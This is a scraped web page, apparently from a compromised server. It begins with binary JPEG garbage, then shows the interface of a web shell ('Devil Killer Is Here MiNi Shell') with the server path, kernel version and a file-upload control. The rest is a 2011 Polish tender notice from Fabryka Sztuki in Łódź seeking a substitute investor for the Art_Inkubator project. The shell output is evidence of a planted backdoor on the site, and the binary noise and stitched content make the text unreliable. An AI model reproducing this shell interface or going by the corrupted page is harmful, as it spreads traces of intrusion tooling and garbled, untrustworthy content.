JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110117/20179-N-2011.html

<p class="kh_header"><b>Łódź: Pełnienie funkcji Inwestora Zastępczego dla zadania inwestycyjnego: Utworzenie w ramach Fabryki Sztuki w Łodzi Inkubatora Kultury - Art_Inkubator</b><br>
<b>Numer ogłoszenia: 20179 - 2011; data zamieszczenia: 17.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fabryka Sztuki w Łodzi , ul. Tymienieckiego 3, 90-365 Łódź, woj. łódzkie, tel. 042 6468865, faks 042 6468865.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fabrykasztuki.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Samorządu Terytorialnego - Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inwestora Zastępczego dla zadania inwestycyjnego: Utworzenie w ramach Fabryki Sztuki w Łodzi Inkubatora Kultury - Art_Inkubator.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest pełnienie funkcji Inwestora Zastępczego dla zadania inwestycyjnego Utworzenie w ramach Fabryki Sztuki w Łodzi Inkubatora Kultury - Art_Inkubator, które zostanie objęte umową z Wykonawcą robót budowlanych wybranym w drodze osobnego postępowania.
Do obowiązków Inwestora Zastępczego należeć będzie:
Kompleksowa obsługa inwestycji wraz z jej rozliczeniem, a także udział w pierwszym przeglądzie gwarancyjnym Inwestycji, a w szczególności:
1) Przygotowanie, i przeprowadzenie postępowania o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na wybór Wykonawcy Inwestycji zgodnie z ustawą Prawo zamówień publicznych na podstawie dokumentacji (projektu budowlanego i wykonawczego, projektu SIWZ i umowy) przekazanej przez Zamawiającego po jej weryfikacji i ewentualnym poprawieniu.
2) sprawowanie zastępstwa inwestorskiego i nadzoru inwestycyjnego we wszystkich branżach, wynikających z Inwestycji zgodnie z obowiązującymi w tym zakresie przepisami prawa,
3) obsługa finansowa Inwestycji
4) obsługa prawna Inwestycji,
5) przygotowanie i przeprowadzenie pierwszego przeglądu gwarancyjnego

Obszar będący przedmiotem planowanej inwestycji to część zespołu poprzemysłowego objętego ochroną konserwatorską na podstawie wpisu do rejestru zabytków miasta Łodzi A/44 z dnia 21.01.1971 roku.
Przedmiotowe budowle stanowią fragment zespołu wykończalni Karola Wilhelma Scheiblera, usytuowanej w części zachodniej rozległego, cennego założenia zabudowy przemysłowej, kształtującej się w XIX wieku i pierwszej ćwierci wieku XX-go. W skład adoptowanej do nowych funkcji zabudowy wchodzą: budynek A - dawna szwalnia z początku XX wieku, magazyn z lat 20-tych XX wieku, budynek B i C - magazyny powstałe ok. 1887 roku i magazyn z lat 80-tych XIX wieku. Są to przykłady architektury przemysłowej, których walorem jest dobry stan zachowania i stosunkowo niewielkie przekształcenia, którym ulegały. Dwa z nich (magazyny z 1887 roku) zachowane są wraz z oryginalnymi wnętrzami i wyposażeniem.
Przywrócenie elewacjom budynków pierwotnych walorów estetycznych i form zbliżonych do historycznych jest niezbędne z uwagi na ich obecny zły stan.

Szczegółowy zakres i sposób realizacji przedmiotu zmówienia zawiera SIWZ oraz umowa, której wzór stanowi załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.00.00-5, 71.54.10.00-2, 71.24.70.00-1, 71.24.80.00-8, 71.30.00.00-1, 79.42.12.00-3, 79.11.00.00-8, 79.11.10.00-5, 79.11.20.00-2, 79.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości 25.000,00 PLN ( słownie: dwadzieścia pięć tysięcy złotych).
2. Wadium może być wnoszone w następujących formach:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz.275, z 2008r. Nr 116, poz. 730 i Nr 227, poz. 1505 oraz z 2010r. Nr 96, poz. 620).

Pozostałe wymagania dotyczące wnoszenia wadium znajdują się w części XI SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, o treści zgodnej z Załącznikiem Nr 2 do SIWZ.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdz. IX pkt 1 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada niezbędną wiedzę i doświadczenie w realizacji usług odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tzn. wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
a) jedną usługę polegającą na nadzorowaniu robót budowlanych w obiekcie zabytkowym o kubaturze nie mniejszej niż 5000m3, wpisanym do rejestru zabytków, w zakresie, której było między innymi nadzorowanie konserwacji zabytkowych: murów ceglanych, elementów stalowych, ślusarki okiennej i drzwiowej
b) dwie usługi polegające na pełnieniu funkcji inwestora zastępczego lub nadzoru inwestorskiego lub innej funkcji z zakresem obowiązków odpowiadających przedmiotowi zamówienia, przy budowie lub rozbudowie obiektu budowlanego, albo budowie lub rozbudowie zespołu obiektów w ramach jednej umowy, gdzie wartości każdej usługi była nie mniejsza niż 400000 PLN netto
lub
c) dwie usługi polegające na pełnieniu funkcji inwestora zastępczego lub nadzoru inwestorskiego lub innej funkcji z zakresem obowiązków odpowiadających przedmiotowi zamówienia przy budowie lub rozbudowie obiektu budowlanego, albo budowie lub rozbudowie zespołu obiektów w ramach jednej umowy, gdzie wartość robót budowlanych była nie mniejsza niż 20,0 mln PLN netto;

Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca wykaże doświadczenie w realizacji trzech usług, w tym:
-jednej usługi określonej w ppkt a),  dwóch usług określonych w ppkt b)
-jednej usługi określonej w ppkt a),  dwóch usług określonych w ppkt c)
-jednej usługi określonej w ppkt a),  jednej usługi określonej w ppkt b) i jednej usługi określonej w ppkt c)

Za obiekt budowlany Zamawiający uznaje budynek wraz z instalacjami i urządzeniami technicznymi - w rozumieniu Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.1999r w sprawie Polskiej Klasyfikacji Obiektów Budowlanych - PKOB - Dz.U. z 1999r. Nr 112 poz. 1316 z późn. zm. (klasa: 1211, 1220, 1261, 1262, 1263, 1265, 1272).

Wykonawca dołączy dokumenty potwierdzające, że w/w nadzory wykonane zostały należycie. Z treści tych dokumentów musi jasno wynikać potwierdzenie wszystkich danych zawartych w w/w wykazie w tym: nazwa zadania i adres, wartość netto robót, wskazanie zamawiającego, rodzaj nadzorowanych robót objętych zadaniem, określony w sposób umożliwiający weryfikację spełniania określonych w SIWZ warunków, opis nadzorowanych robót, których należyte wykonanie potwierdzają, okres sprawowania nadzoru nad realizacją robót, kubatura budynku, w którym roboty były wykonane.

Wykonawca przedstawi wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - sporządzony wg Załącznika Nr 3 do SIWZ, wraz z dokumentami potwierdzającymi ich należyte wykonanie.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdz. IX pkt 1 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tzn.:
a) osobą przewidzianą do pełnienia funkcji Inspektora Kontraktu (Wiodącego Inspektora Nadzoru - koordynatora) posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności architektonicznej lub konstrukcyjno-budowlanej, wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego oraz posiadającą, co najmniej 5 - letnie doświadczenie zawodowe w pełnieniu funkcji Kierownika Projektu (Koordynatora Zespołu Inwestycyjnego, Inżyniera Kontraktu, Kierownika Budowy), w tym przynajmniej przy realizacji jednego obiektu budowlanego, należącego do jednej z klas PKOB wymienionych w Części VII SIWZ.
b) minimum jedną osobą przewidzianą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego posiadającą uprawniania budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz do nadzorowania robót prowadzonych przy zabytku nieruchomym, wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego oraz posiadającą, co najmniej 3 - letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w swojej specjalności, w tym przynajmniej przy realizacji jednego obiektu budowlanego należącego do jednej z klas PKOB wymienionych w Części VII SIWZ, jak również udokumentowaną, co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych, o której mowa w § 8 ust. 1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań lub porzuconych zabytków oraz badań archeologicznych i poszukiwań zabytków ruchomych (Dz. U. z 2004 r. Nr 150 , poz. 1579)
c) minimum jedną osobą przewidzianą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego posiadającą uprawniania budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego oraz posiadającą, co najmniej 3 - letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w swojej specjalności, w tym przynajmniej przy realizacji jednego obiektu budowlanego należącego do jednej z klas PKOB wymienionych w Części VII SIWZ.
d) minimum jedną osobą przewidzianą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego posiadającą uprawniania budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, wraz z ważnym zaświadczeniem do przynależności do właściwej izby samorządu zawodowego oraz posiadającą, co najmniej 3 - letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w swojej specjalności, w tym przynajmniej przy realizacji jednego obiektu użyteczności publicznej wymienionego w Części VII SIWZ,
e) minimum jedną osobą przewidzianą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego posiadającą uprawniania budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji teletechnicznych wraz z ważnym zaświadczeniem do przynależności do właściwej izby samorządu zawodowego oraz posiadającą, co najmniej 3 - letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w swojej specjalności, w tym przynajmniej przy realizacji jednego obiektu budowlanego należącego do jednej z klas PKOB wymienionych w Części VII SIWZ.
f) minimum jedną osobą przewidzianą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego posiadającą uprawniania budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności drogowej wraz z ważnym zaświadczeniem do przynależności do właściwej izby samorządu zawodowego oraz posiadającą, co najmniej 3 - letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w swojej specjalności, w tym przynajmniej przy realizacji jednego obiektu budowlanego należącego do klasy 2112 PKOB.
g) minimum jedną osobą przewidzianą do obsługi prawnej inwestycji, posiadającą aktualne uprawnienia radcy prawnego lub adwokata, posiadająca minimum 5 - letnie doświadczenie w zawodzie adwokata lub radcy prawnego.
wania.

Wykonawca przedstawi wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do realizacji zmówienia, a także z zakresu wykonywanych przez nie czynności - wypełniony dla wszystkich osób wyszczególnionych w rozdz. VII pkt. 4 SIWZ, sporządzony wg Załącznika Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.:
a) osiągnął w ostatnich 3 latach obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, średni przychód netto ze sprzedaży w wysokości, co najmniej 1, 0 mln PLN. Przychód netto ze sprzedaży oceniany zostanie na podstawie Rachunku zysków i strat pozycja Przychód netto ze sprzedaży i zrównane z nimi lub zeznania podatkowego w przypadku prowadzenia działalności na własny rachunek.
b) jest ubezpieczony od odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą (OC deliktowe i Kontraktowe), obejmującą przedmiot zamówienia, na sumę ubezpieczenia minimum 1,0 mln PLN.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdz. IX pkt 1 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Dowód wniesienia wadium (zgodnie z opisem w rozdz. XI SIWZ).
-Pełnomocnictwo podpisane przez uprawnionego/nych przedstawicieli Wykonawcy, - jeżeli Wykonawca działa przez pełnomocnika.
-Dokument stwierdzający ustanowienie pełnomocnika przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia  do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego.</p>
